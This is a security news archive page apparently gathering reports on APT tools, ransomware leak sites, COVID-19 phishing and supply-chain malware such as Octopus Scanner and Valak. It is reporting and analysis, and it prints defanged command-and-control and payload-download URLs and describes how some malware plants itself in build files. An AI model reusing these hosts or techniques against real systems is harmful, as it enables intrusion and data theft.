Category Archives: Malware

Cycldek APT targets Air-Gapped systems using the USBCulprit Tool

A Chinese threat actor tracked as Cycldek (aka Goblin Panda, or Conimes) has developed new tool to steal information from air-gapped systems.

Security experts from Kaspersky Lab reported that the Chinese threat actor tracked as Cycldek (aka Goblin Panda, or Conimes) has developed new tool to steal information from air-gapped systems.

The Cycldek group was first spotted in September 2013, in past campaigns it mainly targeted entities in Southeast Asia using different malware variants, such as PlugX and HttpTunnel.

In 2014, experts noticed an intensification in the activity of the group that appeared interested in the dispute over the South China Sea.

GOBLIN PANDA was focused on Vietnam, most of the targets were in the defense, energy, and government sectors.

In 2018, the cyberespionage group targeted once again Vietnam running a spear-phishing campaign that uses weaponized documents featuring Vietnamese-language lures and themes

The group’s arsenal includes multiple tools for information stealing and lateral movements, some of them are previously unreported.

“One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.” reads the data published by Kaspersky.

Since 2017, the group was observed launching attacks using RTF lure documents with political content related to Vietnam. the messages were dropping a variant of a malicious program named NewCore RAT.

While analyzing NewCore, Kaspersky spotter two different variants named BlueCore and RedCore centered around two clusters of activity. The researchers discovered similarities in both code and infrastructure of the two variants, but they also discovered exclusive features implemented into the RedCore.

“Perhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters.” continues the report. “The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.”

Experts speculate each cluster of activity had a different geographical focus, the operators behind the BlueCore cluster were focused on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster initially targeted Vietnam and later Laos by the end of 2018.

Experts explained that both BlueCore and RedCore malware, downloaded multiple additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems.

Among the tools recently revealed the most important is named USBCulprit, it leverages on USB media in order to exfiltrate victim data, likely because the Cycldek group designed it to target air-gapped networks or relies on physical presence.

Once USBCulprit is loaded to memory and executed, it operates in three phases;

  • the malware prepares the environment for the malware’s execution;
  • the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive;
  • the malware makes lateral movement;

The USBCulprit is able to scan multiple paths, collect documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected removable drive.

The malware was designed to copy itself selectively to certain removable drives in the presence of a particular file, a circumstance that suggests it can be spread laterally to other systems by inserting the infected USB drive.

Kaspersky’s telemetry revealed that USBCulprit was first spotted in the in the wild in 2014, while the latest samples were detected in 2019.

“Cycldek is an example of an actor that has broader capability than publicly perceived.” Kaspersky concluded. “While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.”

Pierluigi Paganini

(SecurityAffairs – USBCulprit, cybersecurity)

The post Cycldek APT targets Air-Gapped systems using the USBCulprit Tool appeared first on Security Affairs.

U.S. Nuclear Contractor Hit with Maze Ransomware, Data Leaked

Westech International provides maintenance for the Minuteman III nuclear-missile program and runs programs for multiple branches of the military.

Sodinokibi ransomware gang launches auction site to sell stolen data

REvil /Sodinokibi ransomware operators launch an auction site to sell data stolen from victims that have chosen to not pay the ransom.

Sodinokibi ransomware operators are very active in this period, a few days after the gang has leaked the files allegedly stolen from the UK power grid middleman Elexon it has announced to launch an auction site to sell data stolen from victims that have chosen to not pay the ransom.

The Sodinokibi ransomware operators have launched an eBay-like auction site for stolen data where they plan to sell data stolen from the victims.

Recently Sodinokibi ransomware group claimed to have stolen gigabytes of legal documents from the entertainment and law firm Grubman Shire Meiselas & Sacks (GSMLaw) that has dozens of international stars and celebrities among its clients.

The list of clients of the law firm includes famous artists like Chris Brown, Madonna, Lady Gaga, Nicki Minaj, Elton John, Timbaland, Robert de Niro, Usher, U2, and Timbaland.

Now the hackers plan to auction Madonna’s legal documents in a future auction.

The Sodinokibi ransomware operators use exploits to compromise the target’s network and infect the largest number of computers as possible.

In May 2019, threat actors were observed exploiting recently patched critical Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware to organizations. In June 2019, the ransomware hit several managed service providers, while in August the same malware infected the company behind DDS Safe solution used by hundreds of dental offices and at least 23 Texas local governments as the result of a coordinated effort.

The Sodinokibi gang also operates a leak site on the dark web where they share samples of stolen files to threatens the victims.

Now the group implemented the new “auction” feature, a first auction is for documents stolen from a Canadian agricultural company that was hacked in May and that refused to pay the ransom.

The starting offer for the auction is $50,000 that could be paid using the Monero cryptocurrency.

sodinokibi gang revil auction
Source BleepingComputer

The gang also threatened to hold an auction for Madonna’s private legal documents stolen from Grubman Shire Meiselas & Sacks (GSMLaw)

The REvil gang published the message “remember Madonna and other people,” suggesting that the files of the music star will be available for auction very soon.

Sodinokibi isn’t the unique ransomware gang that is threatening to publish data of the victims to force to pay the ransom, other gangs are DopplePaymerMazeNefilimNemtyRagnarLocker, and NetWalker.

Pierluigi Paganini

(SecurityAffairs – ransomware, cybersecurity)

The post Sodinokibi ransomware gang launches auction site to sell stolen data appeared first on Security Affairs.

Octopus Scanner Sinks Tentacles into GitHub Repositories

At least 26 different open-source code repositories were found to be infected with an unusual attack on the open-source software supply chain.

Sodinokibi ransomware operators leak files stolen from Elexon electrical middleman

The REvil/Sodinokibi ransomware operators have leaked the files allegedly stolen from the UK power grid middleman Elexon.

In May Elexon, a middleman in the UK power grid network, was the victim of a cyber attack, its systems have been infected with the Sodinokibi ransomware.

The incident impacted only affected the internal IT network, including the company’s email server, and employee laptops

“Hackers have targeted a critical part of the UK’s power network, locking staff out of its systems and leaving them unable to send or receive emails.” reads a post published by The Telegraph.

“Elexon – a key player in the energy market between power station operators and firms that supply households and businesses – said in a statement that its internal systems and company laptops had been affected by the cyberattack. It declined to give further details.”

The company manages electricity supply and demand and distributes the power around the network according to the demand.

“We are advising you that today that ELEXON’s internal IT systems have been impacted by a cyber attack. BSC Central Systems and EMR are currently unaffected and working as normal. The attack is to our internal IT systems and ELEXON’s laptops only.” reads a post published by the company on its website. “We are currently working hard to resolve this. However please be aware that at the moment we are unable to send or receive any emails.”

The company took down the email server in response to the attack, according to Elexon, the systems use to manage the UK’s electricity transit were not impacted.

The company published a second message to announce that it has discovered the root cause of the incident, and that is was working to restore the internal network and employee laptops. Elexon also added that the BSC Central Systems (and their data) and EMR were not impacted and are continuing to work as normal. 

Two weeks later, Sodinokibi operators published 1,280 files allegedly stolen from the company on their leak site. The files contain passports of Elexon staff members and an apparent business insurance application form. 

Even if the company did not reveal details on the attack, experts from security firm Bad Packets reported that Elexon had been running an outdated version of Pulse Secure VPN server, if confirmed threat actors could have exploited it to access the internal network.

Elexon did not pay the ransom and restored operation from backups, for this reason, Sodinokibi operators decided to leak the stolen files.

Recently Sodinokibi ransomware group claimed to have stolen gigabytes of legal documents from the entertainment and law firm Grubman Shire Meiselas & Sacks (GSMLaw) that has dozens of international stars and celebrities among its clients.

The list of clients of the law firm includes famous artists like Chris Brown, Madonna, Lady Gaga, Nicki Minaj, Elton John, Timbaland, Robert de Niro, Usher, U2, and Timbaland.

Sodinokibi isn’t the unique ransomware gang that is threatening to publish data of the victims to force to pay the ransom, other gangs are DopplePaymerMazeNefilimNemtyRagnarLocker, and NetWalker.

Pierluigi Paganini

(SecurityAffairs – Sodinokibi, cybersecurity)

The post Sodinokibi ransomware operators leak files stolen from Elexon electrical middleman appeared first on Security Affairs.

New propagation module makes Trickbot more stealthy

Trickbot infections of Domain Controller (DC) servers has become more difficult to detect due to a new propagation module that makes the malware run from memory, Palo Alto Networks researchers have found. That also means that the malware infection can’t survive a shutdown or reboot of the system, but the stealth vs persistence tradeoff is likely to work in the attackers’ favor since servers are rarely shut down or rebooted. Trickbot’s evolution Trickbot started as … More

The post New propagation module makes Trickbot more stealthy appeared first on Help Net Security.

41% of organizations have not taken any steps to expand secure access for the remote workforce

Currently, organizations are struggling to adjust to the new normal amidst the COVID-19 pandemic, a Bitglass survey reveals. 41% have not taken any steps to expand secure access for the remote workforce, and 50% are citing proper equipment as the biggest impediment to doing so. Consequently, 65% of organizations now enable personal devices to access managed applications. Remote work and secure access concerns When asked what their organizations are primarily concerned with securing while employees … More

The post 41% of organizations have not taken any steps to expand secure access for the remote workforce appeared first on Help Net Security.

Coronavirus-themed attacks May 24 – May 30, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 24 to May 30, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 26 – Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

May 27 – Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn it targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

May 29 – Himera and AbSent-Loader Leverage Covid19 lures

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

May 30 – A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, Coronavirus themed campaigns)

The post Coronavirus-themed attacks May 24 – May 30, 2020 appeared first on Security Affairs.

A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

Security experts from D3Lab have uncovered a new COVID-19-themed phishing campaign that is targeting the users of the Italian National Institute for Social Security (INPS). Like a previous campaign observed in early April, threat actors set up a fake INPS site used (“inps-it[.]top”) to trick victims into downloading a malicious app.

“A new Phishing campaign against INPS users , similar to the previous one of April 6, 2020 , has been detected in the past few hours by our research and analysis center for Phishing campaigns.” reads the post published D3Lab.

“The fraudulent activity is carried out through a web domain created Ad Hoc with similarities, in the name, to the official one of the national social security institution with the intent to download malware to users interested in receiving the Covid-19 allowance allocated from the Italian state.”

COVID-19 campaign INPS
COVID-19 campaign INPS

D3Lab reported its findings to the Italian CERT-AGID that published a security advisory.

Cybercriminals are attempting to take advantage of the Covid-19 indemnity that the Italian government will give to some Italian citizens with specific requirements.

The citizens have to request the Covid-19 indemnity to the goverment through the INPS portal, for this reason, threat actors set up a fake INPS site asking people to download a phantom “application for the new COVID-19 indemnity” which actually returns a malicious APK for Android devices..

The malicious APT, named “acrobatreader.apk,” is a Trojan-Banker malware that is able to monitor the actions performed by the user.

The malware asks users to enable the accessibility service in order to take advantage of the legitimate functions of this service and achieve wider access to the system APIs to communicate with other apps on the device.

“As soon as the presence of connectivity is detected, an HTTP POST request is sent to C2 through the following url ” http: // greedyduck [.] Top / gate [.] Php ” passing two parameters:

  • ” Action “: with botcheck or injcheck values ;
  • ” Data “: information collected and passed in encrypted form (RC4).”

The CERT-AGID published the Indicators of Compromise (IoCs) here.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post A new COVID-19-themed campaign targets Italian users appeared first on Security Affairs.

NetWalker ransomware gang threatens to release Michigan State University files

Michigan State University is the last victim of the NetWalker ransomware, attackers threaten to leak stolen files if it will not pay the ransom in seven days.

Michigan State University hit by ransomware gang, NetWalker ransomware operators are threatening to leak stolen files if the university will not pay the ransom in seven days.

At the time of writing the ransom demand to decrypt their files was not disclosed.

Even if the MSU will restore from backups, the NetWalker ransomware gang will leak the documents stolen on its dark web leak site.

As a proof of the attack, NetWalker ransomware operators have shared five images on the leak site.

“These include two images showing a directory structure allegedly from the university’s network, a passport scan for a student, and two scans of Michigan State financial documents.” reported ZDNet.

Source ZDNet

The NetWalker group is very active in this period, the list of the victims of the gang includes the shipping giant Toll. Researchers also identified a new Coronavirus phishing campaign that aims at delivering the Netwalker Ransomware using COVID-19 lures.

The university did not reveal the extent of the attack, students and employees are still working from home due to the COVID-19 outbreak, anyway, the incident may not impact the e-learning activity.

NetWalker isn’t the unique ransomware gang that is threatening to publish data of the victims to force to pay the ransom, other gangs are DopplePaymer, Maze, Nefilim, Nemty, RagnarLocker, and REvil.

Pierluigi Paganini

(SecurityAffairs – Michigan State University, hacking)

The post NetWalker ransomware gang threatens to release Michigan State University files appeared first on Security Affairs.

Threat Roundup for May 22 to May 29

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between May 22 and May 29. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

Read More



20200529-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for May 22 to May 29 appeared first on Cisco Blogs.

Himera and AbSent-Loader Leverage Covid19 Themes

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  


During our Cyber Defense monitoring activities we intercepted waves of incoming emails directed to many companies under our protective umbrella. These messages were leveraging FMLA (Family and Medical Leave Act) requests related to the ongoing COVID19 pandemics. These emails were weaponized with two versatile cyber-criminal tools: Himera and Absent-Loader.  

Figure1: Email vector example

Loaders are a type of malicious code specialized in loading additional malware code into the victim’s machine. Sometimes, a loader can assume “stealer” behavior, to opportunistically gatherer sensitive information even if they are not supposed to do that. Absent-Loader does that and despite its name behaves this way. In fact, stolen information market is definitely remunerative for cyber criminals: information gathered from infected systems are constantly sell in the underground, typically acquired by other, more structured criminal organization or also by business competitors.

Technical Analysis  

The sample used in this campaign first uses word document which refers to an executable, then it drops another executable and does a renaming operations to evade controls. The following picture reports the infection chain used in this campaign:

Figure 2: Infection Chain

The malicious email wave contained a .doc attachment. Following, the static information of this file:

ThreatHimera Loader dropper
Size95,4 KB (97.745 byte)
FiletypeMicrosoft Word document 

Table 1: Static information about the Malicious document

The interesting feature of this document is the fact that it does not leverage any type of macro or exploit, but it contains the entire executable within it as an embedded object. So, the user is led to double-click on the malicious icon, representing the executable. 

Thus, once clicked, it allows this malicious document to execute a malicious file named HimeraLoader.exe.

ThreatSecond stage dropper
Size143 KB (146.944 byte)
File InfoMicrosoft Visual C++ 8

Table 2: Static information about the HimeraLoader executable

Inspecting the HimeraLoader.exe trace we noticed a really characteristic mutex created during the initial loading of the malicious code: the “HimeraLoader v1.6” mutex, or Mutant.

Figure 3: Himera Loader Mutex

Also, the sample performs some classic anti-analysis tricks using Windows API such as “IsDebbugerPresent”, “IsProcessorFeaturePresent” and “GetStartupInfoW”. The execution will take different paths in the program’s flow if the debugger is present. The function GetStartupInfoW retrieves the contents of the STARTUPINFO structure that was specified when the calling process was created. This function takes as parameter a pointer to a STARTUPINFO structure that receives the startup information and does not return a value.

Figure 4: Relevant strings of the Loader

When the Himera Loader goes through its execution and passes all anti-analysis tricks, it gathers another binary from http:]//195.]2.]92.]151/ad/da/drop/smss.]exe . The remote server is operated by Hosting Technologies LLC, a company running the Russian hosting service brand “”. 

The AbSent-Loader 

The file downloaded from the dropurl has the following static information:

Size0,99 MB (1.047.040 byte)
File InfoMicrosoft Visual C++ 8

Table 3: Static information about the AbsentLoader Payload

When “smms.exe” is executed, it copies itself in a new file winsvchost.exe in the %TEMP% path and creates a scheduled task to maintain persistence after reboot.

Figure 5: Evidence of the Scheduled Task

Moreover, the malware adopts some interesting anti-debug techniques, like the GetTickcount one. The technique is quite similar to that one described in one of our previous report. there is immediately the subtraction of the two values and it is placed in EAX register. After the “call eax” instruction, an immediate subtraction of the first GetTickCount  API call results and this second one is executed. 

Figure 6: GetTickCount anti-debug Technique

Then, the malware establishes TCP connection every 15 minutes. These connections are directed to the same remote host operated by Hosting Technologies LLC  ( but this time it sends HTTP POST requests to the “/ad/da/gate.php” resource.

Figure 7: Evidence of some relevant strings inside the payload

This payload is a new version of AbSent-Loader, a piece of malware that, despite its name, behaves also like a bot, lacking most modern advanced features but sophisticated enough to maintain persistence on the victim host and to escalate the attack with follow up malware implants. 


The attack we intercepted and described here is a clear example of the new threats that are approaching cyberspace during these months: new criminal threat actors with the sole objective to economically exploit the emotional reactions of the people willing to keep the economic fabric alive and running to support the Covid19 response.

In this particular period, cyberspace is getting more and more risky for companies and people, the cyber criminality raised during the lock-downs and these malicious actors are using all the possible mediums to make more money at the expense of companies and organizations. For this reason, we strongly advise companies to adapt and enhance their cyber security perimeter to resist the new volumes and types of cyber attacks we are experiencing these days.

Indicators of Compromise (IoCs) and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – COVID19, hacking)

The post Himera and AbSent-Loader Leverage Covid19 Themes appeared first on Security Affairs.

Octopus Scanner Malware: open source supply chain attack via NetBeans projects on GitHub

GitHub has issued a security alert warning of a malware campaign that is spreading on its platform via boobytrapped NetBeans Java projects.

GitHub has issued a security alert warning of a piece of malware dubbed Octopus Scanner that is spreading on its platform via boobytrapped NetBeans Java projects.

GitHub’s security team discovered the malicious code in projects managed using the Apache NetBeans IDE (integrated development environment), a complete environment composed of editors, wizards, and templates that help users to create applications in Java, PHP and many other languages. t

On March 9, a security researcher informed GitHub about a set of GitHub-hosted repositories that were actively serving malware. The company immediately investigated the incident and discovered malware designed to enumerate and backdoor NetBeans projects, “and which uses the build process and its resulting artifacts to spread itself.”

What makes this case different from previous abuses of the platforms is that the owners of the repositories were aware that they were committing backdoored code into their repositories.

GitHub’s Security Incident Response Team (SIRT) received its initial notification about a set of repositories serving malware-infected open source projects from security researcher JJ.” reads a post published by Github.

“this report was different. The owners of the repositories were completely unaware that they were committing backdoored code into their repositories.”

The Octopus Scanner identifies the NetBeans project files and embeds malicious payload both in project files and build JAR files.

Below is a high -evel description of the Octopus Scanner activity:

  • Identify user’s NetBeans directory
  • Enumerate all projects in the NetBeans directory
  • Copy malicious payload cache.dat to nbproject/cache.dat
  • Modify the nbproject/build-impl.xml file to make sure the malicious payload is executed every time NetBeans project is build
  • If the malicious payload is an instance of the Octopus Scanner itself the newly built JAR file is also infected.
Netbeans octopus-supply chain attack

Experts uncovered 26 open source projects that were backdoored by the Octopus Scanner malware and that were serving backdoored code.

The Octopus Scanner campaign is not recent, it has been going on for years. Experts reported that the oldest sample of the malware was uploaded on the VirusTotal in August 2018.

Upon downloading any of the 26 projects, the malware would infect users’ local computers. The malware scans the victim’s workstation for a local NetBeans IDE install, and attempt to backdoor other developer’s Java projects.

According to the experts, Octopus Scanner is a multiplatform malware, it runs on Windows, macOS, and Linux and downloads a remote access trojan (RAT).

“However, if it was found, the malware would proceed to backdoor NetBeans project builds through the following mechanisms:

  1. It makes sure that every time a project was built, any resulting JAR files got infected with a so-called dropper. A dropper is a mechanism that “drops” something to the filesystem to execute. When executed, the dropper payload ensured local system persistence and would subsequently spawn a Remote Administration Tool (RAT), which connects to a set of C2 servers.
  2. It tries to prevent any NEW project builds from replacing the infected one, to ensure that its malicious build artifacts remained in place.”

The ultimate goal of the campaign is to deliver the RAT on the machines of developers working on sensitive projects to steal sensitive information.

“It was interesting that this malware attacked the NetBeans build process specifically since it is not the most common Java IDE in use today,” GitHub concludes.

“If malware developers took the time to implement this malware specifically for NetBeans, it means that it could either be a targeted attack, or they may already have implemented the malware for build systems such as Make, MsBuild, Gradle and others as well and it may be spreading unnoticed,”

“While infecting build processes is certainly not a new idea, seeing it actively deployed and used in the wild is certainly a disturbing trend.”

Pierluigi Paganini

(SecurityAffairs – NetBeans, hacking)

The post Octopus Scanner Malware: open source supply chain attack via NetBeans projects on GitHub appeared first on Security Affairs.

Steganography in targeted attacks on industrial enterprises in Japan and Europe

Threat actors targeted industrial suppliers in Japan and several European countries in sophisticated attacks, Kaspersky reported.

Researchers from Kaspersky’s ICS CERT unit reported that threat actors targeted industrial suppliers in Japan and several European countries in sophisticated attacks.

The experts first observed the attacks in early 2020, while in early May, threat actors targeted organizations in Japan, Italy, Germany and the UK.

Hackers targeted suppliers of equipment and software for industrial enterprises with spear-phishing messages using malicious Microsoft Office documents. Attackers used PowerShell scripts, as well as various techniques to evade the detection and avoid the analysis of the malware.

“Phishing emails, used as the initial attack vector, were tailored and customized under the specific language for each specific victim. The malware used in this attack performed destructive activity only if the operating system had a localization that matched the language used in the phishing email.” reads the report published by Kaspersky. “For example, in the case of an attack on a company from Japan, the text of a phishing email and a Microsoft Office document containing a malicious macro were written in Japanese. “

The phishing messages are crafted to trick victims into opening the attached document and enable the macros. The emails are written in the target’s language, and the malware only starts if the operating system language on the machine matches the language in the phishing email.

Hackers used the Mimikatz tool to steal the authentication data of Windows accounts stored on a compromised system. At the time, the final goal of the threat actors is still unknown.

Kaspersky experts only observed malicious activity on IT systems, OT networks were not impacted in the attacks.

Upon executing the macro script contained in the bait document, a PowerShell script is decrypted and executed. This script downloads an image from image hosting services such as Imgur or imgbox, experts noticed that the URL of the image is randomly selected from a list.

The image contains data that is extracted by the malware to create another PowerShell script, which in turn creates another PowerShell script that is an obfuscated version of Mimikatz post-exploitation tool.

“The data is hidden in the image using steganographic techniques and is extracted by the malware from pixels defined by the algorithm. Using steganography enables the attackers to evade some security tools, including network traffic scanners.” continues the analysis.

“The data extracted from the image is consecutively encoded using the Base64 algorithm, encrypted with the RSA algorithm and encoded using Base64 again. Curiously, the script has an error in its code, included on purpose, with the exception message used as the decryption key.”

Attackers also used an exception message as the decryption key for a malicious payload, also in this case the technique aims at evade the detection.

Kaspersky confirmed that its solutions have blocked all the attacks it has detected.

“This attack has caught the attention of researchers because the attackers use several unconventional technical solutions.” concludes Kaspersky.

“The use of the above techniques, combined with the pinpoint nature of the infections, indicates that these were targeted attacks. It is a matter of concern that attack victims include contractors of industrial enterprises. If the attackers are able to harvest the credentials of a contractor organization’s employees, this can lead to a range of negative consequences, from the theft of sensitive data to attacks on industrial enterprises via remote administration tools used by the contractor.”

Pierluigi Paganini

(SecurityAffairs – industrial supplier attack, hacking)

The post Steganography in targeted attacks on industrial enterprises in Japan and Europe appeared first on Security Affairs.

Google TAG report Q1 details about nation-state hacking and disinformation

Google Threat Analysis Group (TAG) has published today its first TAG quarterly report that analyzes rising trends in nation-state and financially motivated attacks.

Google also discloses seven coordinated political influence campaigns that took place on its platforms during Q1 2020.

The Google Threat Analysis Group (TAG) is a group inside the Google’s security team that tracks operations conducted by nation-state actors and cybercrime groups. Google TAG has published today its first TAG quarterly report, the Q1 2020 TAG Bulletin, that provides insights on the campaigns monitored in the first quarter of 2020.

The report includes recent findings on government-backed phishing, threats, and disinformation campaigns, as well as information about actions the tech giant has taken against accounts coordinated influence campaigns. 

A first scaring trend reported by Google is the rising of hack-for-fire companies currently operating out of India.

Another trend was the rising number of political influence campaigns carried out by nation-state actors worldwide.

Experts confirm that threat actor continues to use COVID-19 lures, the pandemic has taken center stage in the world of government-backed hacking. Google continues to uncover COVID-19 themed attacks, groups like Iran-linked Charming Kitten focuses on medical and healthcare professionals, including World Health Organization (WHO) employees.

Experts reported new activity from “hack-for-hire” firms, many based in India, that are using Gmail accounts spoofing the WHO to target business leaders in financial services, consulting, and healthcare corporations within numerous countries including, the U.S., Slovenia, Canada, India, Bahrain, Cyprus, and the UK.

The lures are designed to trick victims into signing up for direct notifications from the WHO to stay informed of COVID-19 related announcements, and link to websites under the control of the attackers that clone the official WHO website. 

“We’ve seen new activity from “hack-for-hire” firms, many based in India, that have been creating Gmail accounts spoofing the WHO,” said Shane Huntley, head of Google TAG.

“The accounts have largely targeted business leaders in financial services, consulting, and healthcare corporations within numerous countries including, the US, Slovenia, Canada, India, Bahrain, Cyprus, and the UK.”


While there have been many hack-for-hire companies around the world, most are located in the UE, Israel, and some Arab countries.

This is the first time that a report references the activity of hack-for-hire Indian companies.

The Google TAG also investigated groups that have also engaged in coordinated social and political influence campaigns.

The TAG team tracked a total of seven influence operations in Q1 2020.

In January Google terminated three YouTube channels as part of a coordinated influence operation linked to Iranian state-sponsored International Union of Virtual Media (IUVM) news organization.

In February, the company terminated one advertising account and 82 YouTube channels that were employed in a coordinated influence operation linked to Egypt.

The campaign was sharing political content in Arabic that was supportive of Saudi Arabia, the UAE, Egypt, and Bahrain and was critical of Iran and Qatar. The campaign being tied to the digital marketing firm New Waves based in Cairo.

In March, TAG terminated five different influence operations.

  • Three advertising accounts, one AdSense account, and 11 YouTube channels part of a coordinated influence operation linked to India sharing pro-Qatar messages.
  • Google banned one Play Store developer and terminated 68 YouTube channels as part of a coordinated influence operation sharing political content in Arabic supportive of Turkey and critical of the UAE and Yemen.
  • Google also terminated one advertising account, one AdSense account, 17 YouTube channels, and banned one Play developer involved in a coordinated influence operation linked to Egypt supporting of Saudi Arabia, the UAE, Egypt, and Bahrain and critical of Iran and Qatar.
  • Google also banned one Play developer and terminated 78 YouTube channels used in a coordinated influence operation linked to Serbia.
  • Google also shut down 18 YouTube channels that were part of a coordinated influence operation linked to Indonesia.

“Since March, we’ve removed more than a thousand YouTube channels that we believe to be part of a large campaign and that were behaving in a coordinated manner. These channels were mostly uploading spammy, non-political content, but a small subset posted primarily Chinese-language political content similar to the findings of a recent Graphika report. We’ll also share additional removal actions from April and May in the Q2 Bulletin.” concludes Google.

Pierluigi Paganini

(SecurityAffairs – Google TAG, nation-state acting)

The post Google TAG report Q1 details about nation-state hacking and disinformation appeared first on Security Affairs.

Valak a sophisticated malware that completely changed in 6 months

Valak malware has rapidly changed over the past six months, it was initially designed as a loader, but now it implemented infostealer capabilities.

The Valak malware completely changed over the past six months, it was first developed to act as a loader, but now it implements also infostealer capabilities. 

The malicious code fist appeared in the threat landscape in late 2019, over the past six months experts observed more than 20 versions that finally changing the malware from a loader to an infostealer used in attacks against individuals and enterprise.

“The Valak Malware is a sophisticated malware previously classified as a malware loader. Though it was first observed in late 2019, the Cybereason Nocturnus team has investigated a series of dramatic changes, an evolution of over 30 different versions in less than six months.” reads the analysis published by Cybereason. “This research shows that Valak is more than just a loader for other malware, and can also be used independently as an information stealer to target individuals and enterprises. “

The malicious code was employed in attacks mainly aimed at entities in the US and Germany, in which it was previously bundled with Ursnif and IcedID threats.

The attack chain starts with phishing messages using a weaponized Microsoft Word documents containing malicious macros. Upon enabling the macros, a .DLL file named “U.tmp” is downloaded and saved to a temporary folder.


When the DLL is executed it drops and launches using a WinExec API call. Valak malware uses a malicious JavaScript file with a random name that changes each time it is executed.

The JavaScript code establishes the connections to command-and-control (C2) servers. The scripts also download additional files, decode them using Base64 and an XOR cipher, and then deploy the main payload.

“In the first stage, Valak laid the foundation for the attack. In the second stage, it downloads additional modules for reconnaissance activity and to steal sensitive information.” continues the post.

Valak uses two main payloads, project.aspx and a.aspx, the former ( the second stage JS) manages registry keys, task scheduling for malicious activities, and persistence, whereas the latter, named PluginHost.exe, named “PluginHost.exe”, is an executable file used to manage additional components.

The Valak’s Program class contains the main function of the file main(), which executes the function GetPluginBytes() to download the module components with type “ManagedPlugin”. These components will be loaded reflectively to the executable’s memory and allow the malware to add plugin capabilities.

PluginHost.exe implements multiple functions by loading the specific modules, below a list of modules observed by the experts:

  • Systeminfo:  responsible for extensive reconnaissance;targets local and domain admins
  • Exchgrabber: aims to steal Microsoft Exchange data and infiltrates the enterprises mail system
  • IPGeo: verifies the geolocation of the target
  • Procinfo: collects information about the infected machine’s running processes
  • Netrecon: perform performs network reconnaissance
  • Screencap: captures screenshots from the infected machine

The Systeminfo module contains several reconnaissance functions that allow gathering information about the user, the machine, and existing AV products.

Recent Valak variants have been employed in attacks against Microsoft Exchange servers, likely as part of attacks against enterprises.

“More recent versions of Valak target Microsoft Exchange servers to steal enterprise mailing information and passwords along with the enterprise certificate. This has the potential to access critical enterprise accounts, causing damage to organizations, brand degradation, and ultimately a loss of consumer trust.” concludes the post.

“The extended malware capabilities suggest that Valak can be used independently with or without teaming up with other malware. That being said, it seems as though the threat actor behind Valak is collaborating with other threat actors across the E-Crime ecosystem to create an even more dangerous piece of malware.”

Pierluigi Paganini

(SecurityAffairs – Valak, malware)

The post Valak a sophisticated malware that completely changed in 6 months appeared first on Security Affairs.

Ke3chang hacking group adds new Ketrum malware to its arsenal

The Ke3chang hacking group added a new malware dubbed Ketrum to its arsenal, it borrows portions of code and features from older backdoors.

The Ke3chang hacking group (aka APT15, Vixen Panda, Playful Dragon, and Royal APT) has developed new malware dubbed Ketrum by borrowing parts of the source code and features from their older Ketrican and Okrum backdoors.

“In mid May, we identified three recently uploaded samples from VirusTotal that share code with older APT15 implants. We named this new family of samples, “Ketrum”, due to the merger of features in the documented backdoor families “Ketrican” and “Okrum”.” reads the report published by the security firm Intezer.

“We believe the operation was conducted very recently.”

Back in 2013, the security researchers at FireEye spotted a group of China-Linked hackers that conducted an espionage campaign on foreign affairs ministries in Europe. The campaign was named ‘Operation Ke3chang,’ now threat actors behind the attacks were spotted targeting personnel at Indian embassies across the world.

In May 2016, researchers from Palo Alto found evidence that the threat actors behind the Operation Ke3chang had been active since at least 2010.

The cyber-espionage group is believed to be operating out of China, it also targeted military and oil industry entities, government contractors and European diplomatic missions and organizations.

Intezer researchers recently discovered three Ketrum backdoor samples that were uploaded to the VirusTotal platform, they noticed the samples reused part of the source code and features from Ke3chang’s Ketrican and Okrum backdoors.

